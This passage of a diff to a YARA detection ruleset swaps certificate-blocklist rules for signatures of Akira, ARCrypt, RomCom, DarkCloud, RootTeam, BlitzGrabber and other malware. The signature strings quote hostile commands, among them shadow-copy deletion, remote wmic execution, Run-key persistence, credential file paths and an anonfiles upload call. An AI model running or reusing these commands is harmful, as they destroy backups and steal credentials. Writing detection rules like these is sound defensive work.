+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 7 of ( $f* ) or ( 1 of ( $x* ) and ( 5 of ( $f* ) or 5 of ( $s* ) ) ) or ( 6 of ( $f* ) and 4 of ( $s* ) ) or 12 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_02E44D7D1D38Ae223B27A02Bacd79B53 : FILE
+rule DITEKSHEN_MALWARE_Win_Akira : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Akira Ransomware Windows"
 		author = "ditekSHen"
-		id = "7f2ad143-c46b-58cb-9fe5-c7bb9c6d9234"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "350ecf81-7926-5cd2-b0c8-2dd748775e74"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4010-L4021"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10220-L10243"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7ab506b2e4a716bc6f7115a071f46df4ea4ac88a4b636506a13ac0d383664e58"
+		logic_hash = "73dd0a1b21be8ff7362536f6b6255cd19510632782effd67a56d7656bebf04ff"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "34e0ecae125302d5b1c4a7412dbf17bdc1b59f04"
-		importance = 20
+
+	strings:
+		$x1 = "https://akira" ascii
+		$x2 = ":\\akira\\" ascii
+		$x3 = ".akira" ascii
+		$x4 = "akira_readme.txt" ascii
+		$x5 = "\\akira\\asio\\include\\asio\\impl\\co_spawn.hpp" ascii
+		$s1 = "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject" ascii
+		$s2 = "Win32_ProcessStartup" fullword wide
+		$s3 = /Failed\sto\smake\s(part|full|spot)\sencrypt/ ascii wide
+		$s4 = "--encryption_" ascii
+		$s5 = "--share_file" ascii
+		$s6 = { 24 00 52 00 45 00 43 00 59 00 43 00 4C 00 45 00 2E 00 42 00 49 00 4E 00 00 00 00 00 6? 6? 6? 00 (24|57) 00 (52|69) 00 }
+		$s7 = " PUBLIC KEY-----" ascii
+		$s8 = ".onion" ascii
+		$s9 = "/Esxi_Build_Esxi6/./" ascii nocase
+		$s10 = "No path to encrypt" ascii
+		$s11 = "-fork" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhuhai Kingsoft Office Software Co., Ltd." and pe.signatures [ i ] . serial == "02:e4:4d:7d:1d:38:ae:22:3b:27:a0:2b:ac:d7:9b:53" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or 6 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_041868Dd49840Ff44F8E3D3070568350 : FILE
+rule DITEKSHEN_MALWARE_Linux_Akira : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Akira Ransomware Linux"
 		author = "ditekSHen"
-		id = "2cfbae1f-9c8a-5263-b9d6-5be27fdca822"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "3ac144b3-c747-58e5-bc75-b3f90786f404"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4023-L4034"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10245-L10264"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "80abb596d96cb388bf3ff23598fc889d4c14cccf262d01f10a5be3a738a4907e"
+		logic_hash = "3a00154e1cfc442718e753641d3706ffd4dd8465525d0bb2854f74dfb1cf5dd0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e104f236e3ee7d21a0ea8053fe8fc5c412784079"
-		importance = 20
+
+	strings:
+		$x1 = "https://akira" ascii
+		$x2 = ":\\akira\\" ascii
+		$x3 = ".akira" ascii
+		$x4 = "akira_readme.txt" ascii
+		$s1 = "--encryption_" ascii
+		$s2 = "--share_file" ascii
+		$s3 = { 00 24 52 65 63 79 63 6c 65 2e 42 69 6e 00 24 52 45 43 59 43 4c 45 2e 42 49 4e 00 }
+		$s4 = " PUBLIC KEY-----" ascii
+		$s5 = ".onion" ascii
+		$s6 = "/Esxi_Build_Esxi6/./" ascii nocase
+		$s7 = "No path to encrypt" ascii
+		$s8 = "-fork" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhuhai Kingsoft Office Software Co., Ltd." and pe.signatures [ i ] . serial == "04:18:68:dd:49:84:0f:f4:4f:8e:3d:30:70:56:83:50" )
+		uint16( 0 ) == 0x457f and ( 3 of ( $x* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or 6 of ( $s* ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_C501B7176B29A3Cb737361Cf85414874 : FILE
+rule DITEKSHEN_MALWARE_Win_Romcom_Loader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "8bebf02c-de14-5488-8720-5fc98b0799bd"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Hunt for RomCom loader"
+		author = "ditekShen"
+		id = "49a5398a-e28d-51e2-90d5-479d815f9967"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4036-L4047"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10291-L10307"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f3eb67b39e0e4e12388f17d231fadfc2ea36b1568191a411950c2e24c32ed09c"
+		logic_hash = "7aef88aa9f201c3a1852d63b17c14e44c7c2a7dfe94a9bc77897a4aa0eb97486"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0788801185a6bf70b805c2b97a7c6ce66cfbb38d"
-		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8B\\x92\\xE8\\x89\\xBE\\xE8\\xAF\\xB6\\xE8\\x89\\xBE\\xE8\\xB4\\x9D\\xE8\\xAF\\xB6\\xE8\\xAF\\xB6\\xE8\\xB4\\x9D\\xE5\\x90\\xBE\\xE5\\xBC\\x97\\xE5\\xBC\\x97\\xE5\\x90\\xBE\\xE8\\xAF\\xB6\\xE5\\x8B\\x92\\xE8\\xB4\\x9D\\xE5\\xBC\\x97\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE8\\xAF\\xB6\\xE8\\x89\\xBE\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE8\\x89\\xBE\\xE5\\xBC\\x97\\xE5\\xBC\\x97" and pe.signatures [ i ] . serial == "c5:01:b7:17:6b:29:a3:cb:73:73:61:cf:85:41:48:74" )
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( pe.exports ( "DllCanUnloadNow" ) and pe.exports ( "DllGetClassObject" ) and pe.exports ( "DllRegisterServer" ) and pe.exports ( "DllUnregisterServer" ) and pe.exports ( "GetProxyDllInfo" ) ) and for any fn in pe.export_details : ( fn.forward_name contains "Dll" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_234Bf4Ef892Df307373638014B35Ab37 : FILE
+rule DITEKSHEN_MALWARE_Win_Romcom_Worker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "af403af3-2c10-5742-80f2-c507695106a2"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Hunt for RomCom worker"
+		author = "ditekShen"
+		id = "ce545a33-731c-5ecd-b02e-cedf24f75cc7"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4049-L4060"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10309-L10322"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d01dbb798b309927e666e5e68c56c6eeabad7ccbc427d62f0507597c6e9e7aa7"
+		logic_hash = "488db046458585882a4709438042b57e02d7dbc06483fdfdfc463a64ee8db203"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "348f7e395c77e29c1e17ef9d9bd24481657c7ae7"
-		importance = 20
+
+	strings:
+		$s1 = "UpdateProcThreadAttribute" fullword ascii
+		$s2 = "WriteFile" fullword ascii
+		$s3 = "GetAdaptersAddresses" fullword ascii nocase
+		$s4 = /inflate\s\d+\.\d+\.\d+\sCopyright/ ascii
+		$s5 = "SetHandleInformation" fullword ascii
+		$s6 = "PeekNamedPipe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "23:4b:f4:ef:89:2d:f3:07:37:36:38:01:4b:35:ab:37" )
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.number_of_exports == 1 and pe.exports ( "Main" ) and all of them
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_C650Ae531100A91389A7F030228B3095 : FILE
+rule DITEKSHEN_MALWARE_Win_Romcom_Dropper : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "80ee9422-190d-5a4e-9a4c-fb8d1b2e2f8c"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Hunt for RomCom worker"
+		author = "ditekShen"
+		id = "1b77122d-95d7-535d-897e-b542da17f499"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4062-L4073"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10324-L10335"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e5afd76711e1b466d7eba742f50c7f9551498796f0aca45566bd9686034efac3"
+		logic_hash = "89f62f71e5870c1e5d14bc32dd3508da620f5fa85494251c69682eb09d630029"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "05eebfec568abc5fc4b2fd9e5eca087b02e49f53"
-		importance = 20
+
+	strings:
+		$s1 = "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes" wide nocase
+		$s2 = "\\REGISTRY\\USER" wide nocase
+		$s3 = "BINARY" fullword wide
+		$s4 = "POST" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "POKEROWA STRUNA SP Z O O" and pe.signatures [ i ] . serial == "c6:50:ae:53:11:00:a9:13:89:a7:f0:30:22:8b:30:95" )
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.number_of_exports == 1 and pe.exports ( "Main" ) and 3 of them
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4F8Ebbb263F3Cbe558D37118C43F8D58 : FILE
+rule DITEKSHEN_MALWARE_Win_STEALDEAL : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "c273f7e4-8c88-5205-be4b-3a8e8bed144e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Hunt for STEALDEAL stealer"
+		author = "ditekShen"
+		id = "4685fea3-4050-5395-af2b-cb0ba4104b47"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4075-L4086"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10337-L10348"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e502e7e08fa82f8bd1b2b15c34999ece6b3d59d75ab1a4dda05b4b9440c49b7c"
+		logic_hash = "366c33b06ed9403b2b840d98e25287333eb52f2588f747981b3c0c3baf4fd27a"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "3f27a35fe7af06977138d02ad83ddbf13a67b7c3"
-		importance = 20
+
+	strings:
+		$x1 = "stealDll.dll" fullword ascii
+		$s1 = "SqlExec" fullword ascii
+		$s2 = "etilqs_" fullword ascii
+		$s3 = "SUBQUERY %u" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maxthon Technology Co, Ltd." and pe.signatures [ i ] . serial == "4f:8e:bb:b2:63:f3:cb:e5:58:d3:71:18:c4:3f:8d:58" )
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.exports ( "stub" ) and ( 1 of ( $x* ) or all of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_01Ea62E443Cb2250C870Ff6Bb13Ba98E : FILE
+rule DITEKSHEN_MALWARE_Win_Darkcloud : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects DarkCloud infostealer"
 		author = "ditekSHen"
-		id = "40c5f73b-70b6-5db7-8060-01ad77e5f319"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "e29e1dc7-87b8-5d6b-b73b-460dc2530875"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4088-L4099"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10350-L10371"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dbf281989fb89976f83e0e2395f02c1e8c4c9ec5f96095786d9c6406518eb315"
+		logic_hash = "7826cc4185d6edb760d062019e0fa30f800c34e5fb4b0eedcfb17081e6c7643d"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "f293eed3ff3d548262cddc43dce58cfc7f763622"
-		importance = 20
+
+	strings:
+		$x1 = "=DARKCLOUD=" wide
+		$x2 = "#DARKCLOUD#" wide
+		$x3 = "DARKCLOUD" wide
+		$s1 = "DC-Creds" fullword wide
+		$s2 = "shell.application" fullword wide
+		$s3 = "VBSQLite3.dll" ascii wide nocase
+		$s4 = "getbinaryvalue" fullword wide
+		$s5 = "sqlite_exec" fullword ascii
+		$i1 = "RegWrite" fullword wide
+		$i2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$i3 = "\\Templates\\Stub\\Project" wide
+		$i4 = "\\Credentials" wide
+		$i5 = "SELECT " wide
+		$i6 = "\\163MailContacts.txt" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tencent Technology(Shenzhen) Company Limited" and pe.signatures [ i ] . serial == "01:ea:62:e4:43:cb:22:50:c8:70:ff:6b:b1:3b:a9:8e" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 3 of ( $s* ) or 3 of ( $i* ) ) ) or ( all of ( $s* ) and 1 of ( $i* ) ) or ( 4 of ( $s* ) and 4 of ( $i* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_726Ee7F5999B9E8574Ec59969C04955C : FILE
+rule DITEKSHEN_MALWARE_Win_Arcrypt : FILE
 {
 	meta:
-		description = "Detects IntelliAdmin commercial remote administration signing certificate"
+		description = "Detects ARCrypt / ChileLocker ransomware"
 		author = "ditekSHen"
-		id = "5e88abd2-97d5-5271-ace5-6b7cb2cd6633"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "a53bbae6-a321-549d-9d45-e1a408d08740"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4101-L4112"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10373-L10399"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "494afa3711d93c56d52b8ae944db737cb53db8d27f2255c7045c3bf4478995a3"
+		logic_hash = "cc9fa68d093fdf9745a06beb28e29108cb2ba846122ce097ad892213b1edba25"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2fb952bc1e3fcf85f68d6e2cb5fc46a519ce3fa9"
-		importance = 20
+
+	strings:
+		$c1 = "readme_for_unlock.txt" wide
+		$c2 = "vssadmin.exe delete shadows /all /quiet" wide
+		$c3 = "START /b \"\" cmd /c wmic /node:" wide
+		$c4 = "START /b \"\" cmd /c DEL \"" wide
+		$c5 = "process call create cmd /c START" wide
+		$c6 = "net config server /autodisconnect:" wide
+		$c7 = "/NOBREAK>NUL) ELSE (START /b \"\" cmd /c DEL \"%~f" ascii
+		$c8 = ":\\_ARC\\_WorkSolution\\cryptopp" ascii
+		$e1 = /\.crYpt([A-F]{0,1}(\d+)?)?/ fullword wide
+		$e2 = ".dnt___.crYpt" wide nocase
+		$s1 = "create_directory" fullword ascii
+		$s2 = "create_directories" fullword ascii
+		$s3 = "NoClose" fullword ascii
+		$s4 = "StartMenuLogOff" fullword ascii
+		$s5 = "NoLogOff" fullword ascii
+		$s6 = "DisableTaskMgr" fullword ascii
+		$s7 = "DisableChangePassword" fullword ascii
+		$s8 = "HideFastUserSwitching" fullword ascii
+		$s9 = "RemotePath" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IntelliAdmin, LLC" and pe.signatures [ i ] . serial == "72:6e:e7:f5:99:9b:9e:85:74:ec:59:96:9c:04:95:5c" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $c* ) or 7 of ( $s* ) or ( 3 of ( $c* ) and 4 of ( $s* ) ) or ( 1 of ( $e* ) and ( 1 of ( $c* ) and 1 of ( $s* ) ) ) or ( all of ( $e* ) and ( 1 of ( $c* ) or 1 of ( $s* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0A005D2E2Bcd4137168217D8C727747C : FILE
+rule DITEKSHEN_MALWARE_Win_Rootteamstealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects RootTeam infostealer"
 		author = "ditekSHen"
-		id = "c3888d90-0c09-539a-9155-a60e4670320d"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "3b57ff3e-09cf-52be-ac7f-45ee832d70ab"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4114-L4125"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10401-L10417"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b4024cd0d6c9a86d3956b9ba5d9692fc7ec2d7aa399a56a0b12f9387801a0b08"
+		logic_hash = "d1693865253067527d58c980653d550b55d022d5a394b88090a958e5d5818143"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "df788aa00eb400b552923518108eb1d4f5b7176b"
-		importance = 20
+
+	strings:
+		$x1 = "RootTeamStl" ascii
+		$x2 = "Bot: https://t.me/rootteam_bot" ascii
+		$x3 = "rootteam_bot" ascii
+		$x4 = "Root Team" ascii
+		$s1 = "-ldflags=\"-s -w -H windowsgui -X" ascii
+		$s2 = "'RootTeamStl/vars." ascii
+		$s3 = "{ Hostname string \"json:\\\"hostname\\\"\"; EncryptedUsername string \"json:\\\"encryptedUsername\\\"\"; EncryptedPassword string \"json:\\\"encryptedPassword\\\"\" }" ascii
+		$s4 = "\\Program Files (x86)\\Steam\\config\\loginusers.vdf" ascii
+		$s5 = /RootTeamStl\/managers\/(browser|coldwallets|discord|filegrabber|steam|userinformation)?/ ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing JoinHope Image Technology Ltd." and pe.signatures [ i ] . serial == "0a:00:5d:2e:2b:cd:41:37:16:82:17:d8:c7:27:74:7c" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 4 of ( $s* ) or 5 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D3D74Ae548830D5B1Bca9856E16C564A : FILE
+rule DITEKSHEN_MALWARE_Win_Espioloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Espio loader and obfuscator"
 		author = "ditekSHen"
-		id = "692ef744-9609-5cb1-b425-3bacf012fcdb"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "fb2be984-abd6-5f71-b448-d41c9c3e35c5"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4127-L4138"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10438-L10451"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c72f10af530a6af4526ad956ef6058d097417a8fe3b902e3c7cba27b04e0c2c1"
+		logic_hash = "8ad77a50db48f12e6f6465652b24fc1daa56375bb27e37e0eead1bea55b89e0c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "3f996b75900d566bc178f36b3f4968e2a08365e8"
-		importance = 20
+		clamav_sig = "MALWARE.Win.EspioLoader"
+
+	strings:
+		$pdb = /\\loader\\x64\\(Release|Debug)\\Espio\.pdb/ ascii
+		$s1 = "obfuscatedPayload" fullword wide
+		$s2 = "OBFUSCATEDPAYLOAD" fullword wide
+		$s3 = "\\??\\C:\\Windows\\System32\\werfault.exe" fullword wide
+		$s4 = "C:\\windows\\system32\\ntdll.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Insite Software Inc." and pe.signatures [ i ] . serial == "00:d3:d7:4a:e5:48:83:0d:5b:1b:ca:98:56:e1:6c:56:4a" )
+		uint16( 0 ) == 0x5a4d and ( $pdb or 3 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_41F8253E1Ceafbfd8E49F32C34A68F9E : FILE
+rule DITEKSHEN_MALWARE_Win_Celestybinderloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Celesty Binder loader"
 		author = "ditekSHen"
-		id = "84bd03de-88cd-5180-af11-916dbecd0366"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "9c3404b7-311c-565d-b0fa-cfa80ba97289"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4140-L4151"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10453-L10466"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "53f71030815dcdda8424fe858d26a08cf947a683e69c50ea5fda53f51b88bb93"
+		logic_hash = "8c9ffd48c9c8cd345dccfb48bcb345282f9978f7cf906a61e2ea81c48486b16d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "02e739740b88328ac9c4a6de0ee703b7610f977b"
-		importance = 20
+
+	strings:
+		$s1 = "\\DarkCoderSc\\Desktop\\Celesty Binder\\Stub\\STATIC\\Stub.pdb" ascii
+		$s2 = "DROPIN" fullword ascii wide
+		$s3 = "EXEC" fullword ascii wide
+		$s4 = "RBIND" fullword ascii wide
+		$s5 = "%LAPPDATA%" fullword ascii wide
+		$s6 = "%USERDIR%" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shenzhen Smartspace Software technology Co.,Limited" and pe.signatures [ i ] . serial == "41:f8:25:3e:1c:ea:fb:fd:8e:49:f3:2c:34:a6:8f:9e" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0A5B4F67Ad8B22Afc2Debe6Ce5F8F679 : FILE
+rule DITEKSHEN_MALWARE_Win_Blitzgrabber : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BlitzGrabber infostealer"
 		author = "ditekSHen"
-		id = "e1cc3d27-4f76-58a8-8dd6-fd8dbe48252e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "4240527e-c2f8-5424-986a-c1616fafb9bb"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4153-L4164"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10468-L10487"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "19cf46c112b546c26f12891727fdbc74aaa78bbdcdbc4e041781394f4cf5f719"
+		logic_hash = "8baceacf3c2af61e00b31e8106820b6f1ce2e7a9d98eaed965e698109ae08314"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		thumbprint = "1213865af7ddac1568830748dbdda21498dfb0ba"
-		importance = 20
+
+	strings:
+		$x1 = "**BLITZED GRABBER V" wide
+		$x2 = "\\BlitzedGrabberV" ascii
+		$x3 = "Kyanite" ascii wide nocase
+		$s1 = /;\/\/(SCREENSHOT|PASSWORDS|FORKBOMB|MELTSTUB)\/\// ascii wide
+		$s2 = "KryptedWare" wide
+		$s3 = "chckcopyTemp" wide
+		$s4 = "chckscreenShot" wide
+		$s5 = "Plugin.Banking." ascii
+		$s6 = "sChromiumPswPaths" ascii
+		$s7 = ".CreateDownloadLink(" ascii
+		$s8 = "CaptureScreen()" ascii
+		$s9 = ".UploadFile(\"https://api.anonfiles.com/upload\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Farad LLC" and pe.signatures [ i ] . serial == "0a:5b:4f:67:ad:8b:22:af:c2:de:be:6c:e5:f8:f6:79" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) and 3 of ( $s* ) ) or ( 7 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_65Cd323C2483668B90A44A711D2A6B98 : FILE
+rule DITEKSHEN_MALWARE_Win_Bagle : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect Bagle / Beagle email worm"
 		author = "ditekSHen"
-		id = "b976e930-cf9a-5b0f-9a1b-c35c3f134bdd"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "32632bdf-6cf5-5542-8e1f-70686139a465"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
